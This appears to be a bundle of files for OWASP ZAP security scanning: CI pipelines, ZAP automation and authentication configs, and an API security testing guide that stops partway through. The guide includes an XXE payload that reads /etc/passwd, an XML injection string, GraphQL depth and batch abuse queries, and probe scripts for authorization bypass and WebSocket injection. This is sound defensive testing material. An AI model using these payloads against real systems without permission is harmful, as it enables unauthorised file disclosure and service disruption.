cmd_options: '-a -j'
fail_action: true
allow_issue_writing: false
- name: Upload ZAP Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-baseline-report
path: |
report_html.html
report_json.json
retention-days: 30
- name: Create Issue on Failure
if: failure()
uses: actions/github-script@v7
with:
script: |
github.rest.issues.create({
owner: context.repo.owner,
repo: context.repo.repo,
title: '🔒 ZAP Baseline Scan Found Security Issues',
body: 'ZAP baseline scan detected security vulnerabilities. Please review the scan report in the workflow artifacts.',
labels: ['security', 'automated']
})
zap-full-scan:
name: ZAP Full Active Scan (Staging)
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/develop' || github.event_name == 'schedule'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP Full Scan
uses: zaproxy/action-full-scan@v0.8.0
with:
target: ${{ secrets.STAGING_URL }}
rules_file_name: '.zap/rules.tsv'
cmd_options: '-a -j -x report.xml'
fail_action: true
allow_issue_writing: true
issue_title: 'ZAP Full Scan: Security Vulnerabilities Detected'
- name: Upload ZAP Full Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-full-scan-report
path: |
report_html.html
report_json.json
report.xml
retention-days: 90
# upload-sarif requires a SARIF file; ZAP's -x XML report is not SARIF.
# Generate a SARIF report first (for example via the Automation Framework's sarif-json template,
# see assets/zap_automation.yaml) before enabling this step.
- name: Upload SARIF Report to GitHub Security
uses: github/codeql-action/upload-sarif@v3
if: always()
with:
sarif_file: zap-report.sarif  # placeholder path to the SARIF report you generate
zap-api-scan:
name: ZAP API Scan
runs-on: ubuntu-latest
if: github.event_name == 'push' || github.event_name == 'pull_request'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP API Scan
uses: zaproxy/action-api-scan@v0.6.0
with:
target: ${{ secrets.API_URL }}
format: openapi
api_spec_file: './openapi.yaml'
cmd_options: '-a -j'
fail_action: true
- name: Upload API Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-api-scan-report
path: |
report_html.html
report_json.json
retention-days: 30
zap-authenticated-scan:
name: ZAP Authenticated Scan
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/develop'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Setup Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run Authenticated Scan
env:
APP_PASSWORD: ${{ secrets.TEST_USER_PASSWORD }}
TARGET_URL: ${{ secrets.STAGING_URL }}
run: |
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url $TARGET_URL/login \
--username testuser \
--password-env APP_PASSWORD \
--output ./authenticated-scan-report.html
- name: Upload Authenticated Scan Report
uses: actions/upload-artifact@v4
if: always()
with:
name: zap-authenticated-scan-report
path: authenticated-scan-report.*
retention-days: 90
security-gate:
name: Security Gate Check
runs-on: ubuntu-latest
needs: [zap-baseline-scan]
if: always()
steps:
- name: Download Scan Results
uses: actions/download-artifact@v4
with:
name: zap-baseline-report
- name: Check Security Thresholds
run: |
# Install jq for JSON parsing
sudo apt-get update && sudo apt-get install -y jq
# Count high and medium findings (traditional-json alerts expose riskdesc values such as "High (Medium)")
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.riskdesc | startswith("High"))] | length' report_json.json)
MEDIUM_COUNT=$(jq '[.site[].alerts[] | select(.riskdesc | startswith("Medium"))] | length' report_json.json)
echo "High risk findings: $HIGH_COUNT"
echo "Medium risk findings: $MEDIUM_COUNT"
# Fail if thresholds exceeded
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Security gate failed: $HIGH_COUNT high-risk vulnerabilities found"
exit 1
fi
if [ "$MEDIUM_COUNT" -gt 10 ]; then
echo "❌ Security gate failed: $MEDIUM_COUNT medium-risk vulnerabilities (max: 10)"
exit 1
fi
echo "✅ Security gate passed"
- name: Post Summary
if: always()
run: |
echo "## Security Scan Summary" >> $GITHUB_STEP_SUMMARY
echo "" >> $GITHUB_STEP_SUMMARY
echo "| Risk Level | Count |" >> $GITHUB_STEP_SUMMARY
echo "|------------|-------|" >> $GITHUB_STEP_SUMMARY
jq -r '.site[].alerts[] | .riskdesc | split(" ")[0]' report_json.json | sort | uniq -c | \
awk '{print "| " $2 " | " $1 " |"}' >> $GITHUB_STEP_SUMMARY

View File

@@ -0,0 +1,226 @@
# GitLab CI/CD Pipeline for OWASP ZAP Security Scanning
# Add this to your .gitlab-ci.yml file
stages:
- security
- report
variables:
ZAP_IMAGE: "zaproxy/zap-stable:latest"
STAGING_URL: "https://staging.example.com"
REPORTS_DIR: "security-reports"
# Baseline scan for all merge requests
zap_baseline_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
$ZAP_IMAGE \
zap-baseline.py \
-t $STAGING_URL \
-r /zap/wrk/baseline-report.html \
-J /zap/wrk/baseline-report.json \
-w /zap/wrk/baseline-report.md \
|| true
- echo "Baseline scan completed"
artifacts:
when: always
paths:
- $REPORTS_DIR/
# ZAP's packaged scans do not emit JUnit XML, so no junit report is registered here; review the HTML/JSON artifacts instead
expire_in: 1 week
only:
- merge_requests
- develop
- main
tags:
- docker
# Full active scan (manual trigger for staging)
zap_full_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
-v $(pwd)/.zap:/zap/config/:ro \
$ZAP_IMAGE \
zap-full-scan.py \
-t $STAGING_URL \
-c /zap/config/rules.tsv \
-r /zap/wrk/full-scan-report.html \
-J /zap/wrk/full-scan-report.json \
-x /zap/wrk/full-scan-report.xml \
|| true
# Check for high-risk findings
- |
if command -v jq &> /dev/null; then
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.riskdesc | startswith("High"))] | length' $REPORTS_DIR/full-scan-report.json)
echo "High risk findings: $HIGH_COUNT"
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Security scan failed: $HIGH_COUNT high-risk vulnerabilities"
exit 1
fi
fi
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 4 weeks
only:
- develop
when: manual
allow_failure: false
tags:
- docker
# API security scan
zap_api_scan:
stage: security
image: docker:latest
services:
- docker:dind
script:
- mkdir -p $REPORTS_DIR
- |
if [ -f "openapi.yaml" ]; then
docker run --rm \
-v $(pwd)/$REPORTS_DIR:/zap/wrk/:rw \
-v $(pwd):/zap/specs/:ro \
$ZAP_IMAGE \
zap-api-scan.py \
-t $STAGING_URL \
-f openapi \
-d /zap/specs/openapi.yaml \
-r /zap/wrk/api-scan-report.html \
-J /zap/wrk/api-scan-report.json \
|| true
else
echo "OpenAPI specification not found, skipping API scan"
fi
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 1 week
only:
- merge_requests
- develop
allow_failure: true
tags:
- docker
# Authenticated scan (requires test credentials)
zap_authenticated_scan:
stage: security
image: python:3.11-slim
before_script:
- apt-get update && apt-get install -y docker.io
script:
- mkdir -p $REPORTS_DIR
- |
python3 scripts/zap_auth_scanner.py \
--target $STAGING_URL \
--auth-type form \
--login-url $STAGING_URL/login \
--username $TEST_USERNAME \
--password-env TEST_PASSWORD \
--output $REPORTS_DIR/authenticated-scan-report.html
artifacts:
when: always
paths:
- $REPORTS_DIR/
expire_in: 4 weeks
only:
- develop
when: manual
tags:
- docker
# Security gate - check thresholds
security_gate:
stage: report
image: alpine:latest
before_script:
- apk add --no-cache jq
script:
- |
if [ -f "$REPORTS_DIR/baseline-report.json" ]; then
HIGH_COUNT=$(jq '[.site[].alerts[] | select(.riskdesc | startswith("High"))] | length' $REPORTS_DIR/baseline-report.json)
MEDIUM_COUNT=$(jq '[.site[].alerts[] | select(.riskdesc | startswith("Medium"))] | length' $REPORTS_DIR/baseline-report.json)
echo "==================================="
echo "Security Scan Results"
echo "==================================="
echo "High risk findings: $HIGH_COUNT"
echo "Medium risk findings: $MEDIUM_COUNT"
echo "==================================="
# Fail on high-risk findings
if [ "$HIGH_COUNT" -gt 0 ]; then
echo "❌ Build failed: High-risk vulnerabilities detected"
exit 1
fi
# Warn on medium-risk findings above threshold
if [ "$MEDIUM_COUNT" -gt 10 ]; then
echo "⚠️ Warning: $MEDIUM_COUNT medium-risk findings (threshold: 10)"
fi
echo "✅ Security gate passed"
else
echo "No scan report found, skipping security gate"
fi
dependencies:
- zap_baseline_scan
only:
- merge_requests
- develop
- main
# Generate consolidated report
generate_report:
stage: report
image: alpine:latest
before_script:
- apk add --no-cache jq curl
script:
- |
echo "# Security Scan Report" > $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
echo "**Scan Date:** $(date)" >> $REPORTS_DIR/summary.md
echo "**Target:** $STAGING_URL" >> $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
echo "## Findings Summary" >> $REPORTS_DIR/summary.md
echo "" >> $REPORTS_DIR/summary.md
if [ -f "$REPORTS_DIR/baseline-report.json" ]; then
echo "| Risk Level | Count |" >> $REPORTS_DIR/summary.md
echo "|------------|-------|" >> $REPORTS_DIR/summary.md
jq -r '.site[].alerts[] | .riskdesc | split(" ")[0]' $REPORTS_DIR/baseline-report.json | \
sort | uniq -c | awk '{print "| " $2 " | " $1 " |"}' >> $REPORTS_DIR/summary.md
fi
cat $REPORTS_DIR/summary.md
artifacts:
when: always
paths:
- $REPORTS_DIR/summary.md
expire_in: 4 weeks
dependencies:
- zap_baseline_scan
only:
- merge_requests
- develop
- main

View File

@@ -0,0 +1,196 @@
# OWASP ZAP Automation Framework Configuration
# Complete automation workflow for web application security testing
env:
contexts:
- name: WebApp-Security-Scan
urls:
- ${TARGET_URL}
includePaths:
- ${TARGET_URL}.*
excludePaths:
- .*logout.*
- .*signout.*
- .*\\.css
- .*\\.js
- .*\\.png
- .*\\.jpg
- .*\\.gif
- .*\\.svg
authentication:
method: form
parameters:
loginUrl: ${LOGIN_URL}
loginRequestData: username={%username%}&password={%password%}
verification:
method: response
loggedInRegex: "\\QWelcome\\E"
loggedOutRegex: "\\QLogin\\E"
sessionManagement:
method: cookie
parameters:
sessionCookieName: JSESSIONID
users:
- name: test-user
credentials:
username: ${TEST_USERNAME}
password: ${TEST_PASSWORD}
parameters:
failOnError: true
failOnWarning: false
progressToStdout: true
vars:
target_url: ${TARGET_URL}
api_key: ${ZAP_API_KEY}
jobs:
# Environment setup
- type: environment
parameters:
deleteGlobalAlerts: true
updateAddOns: true
# Import OpenAPI specification (if available)
- type: openapi
parameters:
apiFile: ${OPENAPI_SPEC_FILE}
apiUrl: ${TARGET_URL}
targetUrl: ${TARGET_URL}
context: WebApp-Security-Scan
optional: true
# Spider crawling
- type: spider
parameters:
context: WebApp-Security-Scan
user: test-user
maxDuration: 10
maxDepth: 5
maxChildren: 10
acceptCookies: true
handleODataParametersVisited: true
parseComments: true
parseRobotsTxt: true
parseSitemapXml: true
parseSVNEntries: true
parseGit: true
postForm: true
processForm: true
requestWaitTime: 200
# AJAX Spider for JavaScript-heavy applications
- type: spiderAjax
parameters:
context: WebApp-Security-Scan
user: test-user
maxDuration: 10
maxCrawlDepth: 5
numberOfBrowsers: 2
browserId: firefox-headless
clickDefaultElems: true
clickElemsOnce: true
eventWait: 1000
reloadWait: 1000
optional: true
# Wait for passive scanning to complete
- type: passiveScan-wait
parameters:
maxDuration: 5
# Configure passive scan rules
- type: passiveScan-config
parameters:
maxAlertsPerRule: 10
scanOnlyInScope: true
enableTags: true
disableRules:
- 10096 # Timestamp Disclosure (informational)
# Active scanning
- type: activeScan
parameters:
context: WebApp-Security-Scan
user: test-user
policy: Default Policy
maxRuleDurationInMins: 5
maxScanDurationInMins: 30
addQueryParam: false
defaultPolicy: Default Policy
delayInMs: 0
handleAntiCSRFTokens: true
injectPluginIdInHeader: false
scanHeadersAllRequests: false
threadPerHost: 2
# Wait for active scanning to complete
- type: activeScan-wait
# Generate reports
- type: report
parameters:
template: traditional-html
reportDir: ${REPORT_DIR}
reportFile: security-report.html
reportTitle: Web Application Security Assessment
reportDescription: Automated DAST scan using OWASP ZAP
displayReport: false
- type: report
parameters:
template: traditional-json
reportDir: ${REPORT_DIR}
reportFile: security-report.json
reportTitle: Web Application Security Assessment
- type: report
parameters:
template: traditional-xml
reportDir: ${REPORT_DIR}
reportFile: security-report.xml
reportTitle: Web Application Security Assessment
- type: report
parameters:
template: sarif-json
reportDir: ${REPORT_DIR}
reportFile: security-report.sarif
reportTitle: Web Application Security Assessment (SARIF)
optional: true
# Alert filters (false positive suppression)
alertFilters:
- ruleId: 10021
newRisk: Info
url: ".*\\.css|.*\\.js|.*cdn\\..*"
context: WebApp-Security-Scan
- ruleId: 10096
newRisk: Info
url: ".*api\\..*"
parameter: "created_at|updated_at|timestamp"
context: WebApp-Security-Scan
# Scan policies
policies:
- name: Default Policy
defaultStrength: Medium
defaultThreshold: Medium
rules:
- id: 40018 # SQL Injection
strength: High
threshold: Low
- id: 40012 # Cross-Site Scripting (Reflected)
strength: High
threshold: Low
- id: 40014 # Cross-Site Scripting (Persistent)
strength: High
threshold: Low
- id: 90019 # Server-Side Code Injection
strength: High
threshold: Low
- id: 90020 # Remote OS Command Injection
strength: High
threshold: Low

View File

@@ -0,0 +1,192 @@
<?xml version="1.0" encoding="UTF-8"?>
<!--
OWASP ZAP Authentication Context Template
Configure this file for form-based, HTTP, or script-based authentication
-->
<configuration>
<context>
<!-- Context Name -->
<name>WebApp-Auth-Context</name>
<desc>Authentication context for web application security testing</desc>
<!-- Enable context -->
<inscope>true</inscope>
<!-- URL Scope Definition -->
<!-- Include all URLs under target domain -->
<incregexes>https://app\.example\.com/.*</incregexes>
<!-- Exclude logout and static content -->
<excregexes>https://app\.example\.com/logout</excregexes>
<excregexes>https://app\.example\.com/signout</excregexes>
<excregexes>https://app\.example\.com/static/.*</excregexes>
<excregexes>.*\.css</excregexes>
<excregexes>.*\.js</excregexes>
<excregexes>.*\.png|.*\.jpg|.*\.gif</excregexes>
<!-- Technology Detection -->
<tech>
<include>Language</include>
<include>Language.JavaScript</include>
<include>OS</include>
<include>OS.Linux</include>
<include>WS</include>
</tech>
<!-- Authentication Configuration -->
<authentication>
<!--
Authentication Types:
- formBasedAuthentication: Traditional login forms
- httpAuthentication: HTTP Basic/Digest/NTLM
- scriptBasedAuthentication: Custom authentication via script
-->
<type>formBasedAuthentication</type>
<!-- Form-Based Authentication -->
<form>
<!-- Login URL -->
<loginurl>https://app.example.com/login</loginurl>
<!-- Login Request Body (POST parameters) -->
<!-- Use {%username%} and {%password%} as placeholders -->
<loginbody>username={%username%}&amp;password={%password%}&amp;csrf_token={%csrf_token%}</loginbody>
<!-- Login Page URL (where login form is displayed) -->
<loginpageurl>https://app.example.com/login</loginpageurl>
</form>
<!-- HTTP Authentication (uncomment if using) -->
<!--
<http>
<realm>Protected Area</realm>
<hostname>app.example.com</hostname>
<port>443</port>
</http>
-->
<!-- Logged-In Indicator (regex pattern that appears when logged in) -->
<!-- This helps ZAP determine if authentication succeeded -->
<loggedin>\QWelcome,\E</loggedin>
<!-- Alternative patterns:
<loggedin>\QLogout\E</loggedin>
<loggedin>\Qdashboard\E</loggedin>
<loggedin>class="user-menu"</loggedin>
-->
<!-- Logged-Out Indicator (regex pattern that appears when logged out) -->
<loggedout>\QYou are not logged in\E</loggedout>
<!-- Alternative patterns:
<loggedout>\QLogin\E</loggedout>
<loggedout>\QSign In\E</loggedout>
-->
<!-- Poll URL for verification (optional) -->
<pollurl>https://app.example.com/api/session/verify</pollurl>
<polldata></polldata>
<pollfreq>60</pollfreq>
</authentication>
<!-- Session Management -->
<sessionManagement>
<!--
Session Management Types:
- cookieBasedSessionManagement: Session via cookies (most common)
- httpAuthSessionManagement: HTTP authentication
- scriptBasedSessionManagement: Custom session handling
-->
<type>cookieBasedSessionManagement</type>
<!-- Session cookies to monitor -->
<sessioncookies>
<cookie>JSESSIONID</cookie>
<cookie>PHPSESSID</cookie>
<cookie>sessionid</cookie>
<cookie>session_token</cookie>
</sessioncookies>
</sessionManagement>
<!-- Test Users -->
<users>
<!-- User 1: Standard test user -->
<user>
<name>testuser</name>
<enabled>true</enabled>
<credentials>
<credential>
<name>username</name>
<value>testuser</value>
</credential>
<credential>
<name>password</name>
<value>TestPassword123!</value>
</credential>
<!-- CSRF token (if needed) -->
<!--
<credential>
<name>csrf_token</name>
<value></value>
</credential>
-->
</credentials>
</user>
<!-- User 2: Admin user (if testing authorization) -->
<user>
<name>adminuser</name>
<enabled>false</enabled>
<credentials>
<credential>
<name>username</name>
<value>adminuser</value>
</credential>
<credential>
<name>password</name>
<value>AdminPassword123!</value>
</credential>
</credentials>
</user>
</users>
<!-- Forced User Mode (for authorization testing) -->
<!--
Enables testing if authenticated user can access resources
they shouldn't have access to
-->
<forcedUserMode>false</forcedUserMode>
<!-- Data Driven Nodes -->
<!--
For testing parameters with different values
-->
<datadrivennodes>
<node>
<name>user_id</name>
<url>https://app.example.com/api/users/{user_id}</url>
</node>
</datadrivennodes>
</context>
<!-- Global Exclude URLs (applied to all contexts) -->
<globalexcludeurl>
<regex>https://.*\.googleapis\.com/.*</regex>
<regex>https://.*\.google-analytics\.com/.*</regex>
<regex>https://.*\.googletagmanager\.com/.*</regex>
<regex>https://cdn\..*</regex>
</globalexcludeurl>
<!-- Anti-CSRF Token Configuration -->
<anticsrf>
<!-- Enable anti-CSRF token handling -->
<enabled>true</enabled>
<!-- Token names to automatically detect and handle -->
<tokennames>
<tokenname>csrf_token</tokenname>
<tokenname>csrftoken</tokenname>
<tokenname>_csrf</tokenname>
<tokenname>authenticity_token</tokenname>
<tokenname>__RequestVerificationToken</tokenname>
</tokennames>
</anticsrf>
</configuration>

View File

@@ -0,0 +1,40 @@
# Reference Document Template
This file contains detailed reference material that Claude should load only when needed.
## Table of Contents
- [Section 1](#section-1)
- [Section 2](#section-2)
- [Security Standards](#security-standards)
## Section 1
Detailed information, schemas, or examples that are too large for SKILL.md.
## Section 2
Additional reference material.
## Security Standards
### OWASP Top 10
Reference relevant OWASP categories:
- A01: Broken Access Control
- A02: Cryptographic Failures
- etc.
### CWE Mappings
Map to relevant Common Weakness Enumeration categories:
- CWE-79: Cross-site Scripting
- CWE-89: SQL Injection
- etc.
### MITRE ATT&CK
Reference relevant tactics and techniques if applicable:
- TA0001: Initial Access
- T1190: Exploit Public-Facing Application
- etc.

View File

@@ -0,0 +1,475 @@
# ZAP API Security Testing Guide
Advanced guide for testing REST, GraphQL, SOAP, and WebSocket APIs using OWASP ZAP.
## Overview
Modern applications rely heavily on APIs. This guide covers comprehensive API security testing patterns using ZAP's API scanning capabilities.
## API Types Supported
- **REST APIs** (JSON, XML)
- **GraphQL APIs**
- **SOAP APIs** (WSDL-based)
- **gRPC APIs**
- **WebSocket APIs**
## REST API Testing
### Testing with OpenAPI/Swagger Specification
**Best Practice:** Always use API specifications when available for complete coverage.
```bash
# Basic OpenAPI scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com \
-f openapi \
-d /zap/wrk/openapi.yaml \
-r /zap/wrk/api-report.html
```
### Testing Without Specification (Spider-Based)
When no specification is available:
```bash
# Use standard spider with API context
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t https://api.example.com \
-r /zap/wrk/api-report.html \
-z "-config spider.parseComments=true -config spider.parseRobotsTxt=true"
```
### Authentication Patterns
#### Bearer Token (JWT)
```bash
# Obtain token first
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"username":"testuser","password":"password"}' \
| jq -r '.access_token')
# Scan with authentication
python3 scripts/zap_api_scan.py \
--target https://api.example.com \
--format openapi \
--spec openapi.yaml \
--header "Authorization: Bearer $TOKEN"
```
#### API Key Authentication
```bash
# API key in header
python3 scripts/zap_api_scan.py \
--target https://api.example.com \
--format openapi \
--spec openapi.yaml \
--header "X-API-Key: your-api-key-here"
# API key in query parameter
python3 scripts/zap_api_scan.py \
--target https://api.example.com?api_key=your-api-key \
--format openapi \
--spec openapi.yaml
```
### Common REST API Vulnerabilities
#### 1. Broken Object Level Authorization (BOLA)
**Detection:** Test access to resources belonging to other users.
**Manual Test:**
```bash
# Request resource with different user IDs
curl -H "Authorization: Bearer $USER1_TOKEN" \
https://api.example.com/users/123/profile
curl -H "Authorization: Bearer $USER2_TOKEN" \
https://api.example.com/users/123/profile # Should be denied
```
**ZAP Configuration:**
Add authorization test scripts to detect BOLA.
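A minimal sketch of the same check outside ZAP, assuming a hypothetical `/users/{id}/profile` endpoint and two test tokens exported as environment variables; it flags objects readable by a user who does not own them:
```python
#!/usr/bin/env python3
"""Minimal BOLA probe: user B requests objects owned by user A (hypothetical endpoint)."""
import os
import requests

API = "https://api.example.com"
OWNER_TOKEN = os.environ["USER_A_TOKEN"]      # owns the test objects
ATTACKER_TOKEN = os.environ["USER_B_TOKEN"]   # should be denied access to them

for object_id in range(100, 110):             # sample of object IDs to test
    url = f"{API}/users/{object_id}/profile"
    owner = requests.get(url, headers={"Authorization": f"Bearer {OWNER_TOKEN}"})
    attacker = requests.get(url, headers={"Authorization": f"Bearer {ATTACKER_TOKEN}"})
    # A 200 for the attacker on an object the owner can read suggests BOLA
    if owner.status_code == 200 and attacker.status_code == 200:
        print(f"[!] Possible BOLA: {url} readable by both users")
```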
#### 2. Mass Assignment
**Detection:** Send additional fields not in API specification.
**Test Payload:**
```json
{
"username": "testuser",
"email": "test@example.com",
"is_admin": true, # Unauthorized field
"role": "admin" # Unauthorized field
}
```
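A short probe sketch, assuming a hypothetical `/users` endpoint that returns the created resource with an `id` field; it submits the extra fields and reads the resource back to see whether they were persisted:
```python
import os
import requests

API = "https://api.example.com"
HEADERS = {"Authorization": f"Bearer {os.environ['TOKEN']}"}

# Send fields the API specification does not expose for this endpoint
payload = {"username": "testuser", "email": "test@example.com", "is_admin": True, "role": "admin"}
created = requests.post(f"{API}/users", json=payload, headers=HEADERS).json()

# Read the resource back; persisted privilege fields indicate mass assignment
user = requests.get(f"{API}/users/{created['id']}", headers=HEADERS).json()
if user.get("is_admin") or user.get("role") == "admin":
    print("[!] Mass assignment: privileged fields accepted from client input")
```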
#### 3. Rate Limiting
**Detection:** Send multiple requests rapidly.
```bash
# Test rate limiting
for i in {1..100}; do
curl https://api.example.com/endpoint -H "Authorization: Bearer $TOKEN"
done
```
**Expected:** HTTP 429 (Too Many Requests) after threshold.
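A small sketch that records when the first 429 appears (endpoint and request count are placeholders):
```python
import os
import requests

url = "https://api.example.com/endpoint"
headers = {"Authorization": f"Bearer {os.environ['TOKEN']}"}

first_429 = None
for i in range(1, 101):
    if requests.get(url, headers=headers).status_code == 429:
        first_429 = i
        break

if first_429:
    print(f"Rate limiting kicked in after {first_429} requests (HTTP 429)")
else:
    print("[!] No HTTP 429 observed in 100 requests; rate limiting may be missing")
```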
## GraphQL API Testing
### Testing with GraphQL Schema
```bash
# Scan GraphQL endpoint with schema
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com/graphql \
-f graphql \
-d /zap/wrk/schema.graphql \
-r /zap/wrk/graphql-report.html
```
### GraphQL Introspection
**Check if introspection is enabled:**
```bash
curl -X POST https://api.example.com/graphql \
-H "Content-Type: application/json" \
-d '{"query": "{ __schema { types { name } } }"}'
```
**Security Note:** Disable introspection in production.
### GraphQL-Specific Vulnerabilities
#### 1. Query Depth/Complexity Attacks
**Malicious Query:**
```graphql
query {
user {
posts {
comments {
author {
posts {
comments {
author {
# ... deeply nested
}
}
}
}
}
}
}
}
```
**Mitigation:** Implement query depth/complexity limits.
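A library-agnostic sketch of such a limit that approximates depth by brace nesting in the raw query string; production implementations should walk the parsed AST instead:
```python
def query_depth(query: str) -> int:
    """Approximate GraphQL selection-set depth by tracking brace nesting."""
    depth = max_depth = 0
    for ch in query:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth

MAX_DEPTH = 6

def reject_if_too_deep(query: str) -> None:
    if query_depth(query) > MAX_DEPTH:
        raise ValueError(f"Query depth exceeds limit of {MAX_DEPTH}")
```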
#### 2. Batch Query Attacks
**Malicious Query:**
```graphql
query {
user1: user(id: 1) { name email }
user2: user(id: 2) { name email }
# ... repeated hundreds of times
user500: user(id: 500) { name email }
}
```
**Mitigation:** Limit batch query size.
#### 3. Field Suggestions
When introspection is disabled, test field suggestions:
```graphql
query {
user {
nam # Intentional typo to trigger suggestions
}
}
```
## SOAP API Testing
### Testing with WSDL
```bash
# SOAP API scan with WSDL
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.example.com/soap \
-f soap \
-d /zap/wrk/service.wsdl \
-r /zap/wrk/soap-report.html
```
### SOAP-Specific Vulnerabilities
#### 1. XML External Entity (XXE)
**Test Payload:**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope>
<soap:Body>
<login>
<username>&xxe;</username>
</login>
</soap:Body>
</soap:Envelope>
```
#### 2. XML Injection
**Test Payload:**
```xml
<username>admin</username><role>admin</role></user><user><username>attacker</username>
```
## WebSocket Testing
### Manual WebSocket Testing
ZAP can intercept WebSocket traffic:
1. Configure browser proxy to ZAP
2. Connect to WebSocket endpoint
3. Review messages in ZAP's WebSocket tab
4. Manually craft malicious messages
### Common WebSocket Vulnerabilities
- **Message Injection:** Inject malicious payloads in WebSocket messages
- **Authentication Bypass:** Test if authentication is required for WebSocket connections
- **Message Tampering:** Modify messages in transit
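A minimal probe sketch for the issues above, assuming the `websockets` package and a hypothetical JSON chat message format; it checks whether unauthenticated connections are accepted and whether injected markup is reflected:
```python
import asyncio
import json
import websockets  # pip install websockets

async def probe(url: str) -> None:
    # Connect without any authentication header or cookie
    async with websockets.connect(url) as ws:
        print("[!] Unauthenticated WebSocket connection accepted")
        # Inject a script payload into a chat-style message and observe the echo
        await ws.send(json.dumps({"type": "chat", "message": "<script>alert(1)</script>"}))
        reply = await ws.recv()
        if "<script>" in str(reply):
            print("[!] Payload reflected without encoding:", reply)

asyncio.run(probe("wss://app.example.com/ws"))
```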
## API Security Testing Checklist
### Authentication & Authorization
- [ ] Test unauthenticated access to protected endpoints
- [ ] Test authorization bypass (access other users' data)
- [ ] Test JWT token validation (expiration, signature)
- [ ] Test API key validation
- [ ] Test role-based access control (RBAC)
### Input Validation
- [ ] Test SQL injection in parameters
- [ ] Test NoSQL injection (MongoDB, etc.)
- [ ] Test command injection
- [ ] Test XML injection (for SOAP APIs)
- [ ] Test mass assignment vulnerabilities
- [ ] Test parameter pollution
### Rate Limiting & DoS
- [ ] Verify rate limiting is enforced
- [ ] Test resource exhaustion (large payloads)
- [ ] Test query complexity limits (GraphQL)
- [ ] Test batch request limits
### Data Exposure
- [ ] Check for sensitive data in responses
- [ ] Test verbose error messages
- [ ] Verify PII is properly protected
- [ ] Check for data leakage in logs
### Transport Security
- [ ] Verify HTTPS is enforced
- [ ] Test TLS configuration (strong ciphers only)
- [ ] Check certificate validation
- [ ] Verify HSTS header is set
### Business Logic
- [ ] Test state manipulation
- [ ] Test payment flow manipulation
- [ ] Test workflow bypass
- [ ] Test negative values/amounts
## ZAP Automation for API Testing
### Automation Framework Configuration
`api_automation.yaml`:
```yaml
env:
contexts:
- name: API-Context
urls:
- https://api.example.com
includePaths:
- https://api.example.com/.*
authentication:
method: header
parameters:
header: Authorization
value: "Bearer ${API_TOKEN}"
jobs:
- type: openapi
parameters:
apiFile: /zap/wrk/openapi.yaml
apiUrl: https://api.example.com
targetUrl: https://api.example.com
context: API-Context
- type: passiveScan-wait
- type: activeScan
parameters:
context: API-Context
policy: API-Scan-Policy
user: api-user
- type: report
parameters:
template: traditional-html
reportDir: /zap/wrk/
reportFile: api-security-report.html
reportTitle: API Security Assessment
```
Run:
```bash
export API_TOKEN="your-token-here"
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable \
zap.sh -cmd -autorun /zap/wrk/api_automation.yaml
```
## Custom API Scan Policies
### Create API-Optimized Scan Policy
Disable irrelevant checks for APIs:
- Disable DOM XSS checks (no browser context)
- Disable CSRF checks (stateless APIs)
- Enable injection checks (SQL, NoSQL, Command)
- Enable authentication/authorization checks
See `assets/scan_policy_api.policy` for pre-configured policy.
## API Testing Tools Integration
### Postman Integration
Export Postman collection to OpenAPI:
```bash
# newman runs collections but does not convert them; use a converter such as postman-to-openapi
npx p2o collection.json -f openapi.yaml
```
### cURL to OpenAPI Conversion
Use tools like `curl-to-openapi` to generate specs from cURL commands.
## Common API Testing Patterns
### Pattern 1: CRUD Operation Testing
Test all CRUD operations for each resource:
```bash
# CREATE
curl -X POST https://api.example.com/users \
-H "Authorization: Bearer $TOKEN" \
-d '{"username":"testuser"}'
# READ
curl https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN"
# UPDATE
curl -X PUT https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN" \
-d '{"username":"updated"}'
# DELETE
curl -X DELETE https://api.example.com/users/123 \
-H "Authorization: Bearer $TOKEN"
```
### Pattern 2: Multi-User Testing
Test with different user roles:
```bash
# Admin user
export ADMIN_TOKEN="admin-token"
python3 scripts/zap_api_scan.py --target https://api.example.com \
--header "Authorization: Bearer $ADMIN_TOKEN"
# Regular user
export USER_TOKEN="user-token"
python3 scripts/zap_api_scan.py --target https://api.example.com \
--header "Authorization: Bearer $USER_TOKEN"
```
### Pattern 3: Versioned API Testing
Test all API versions:
```bash
# v1
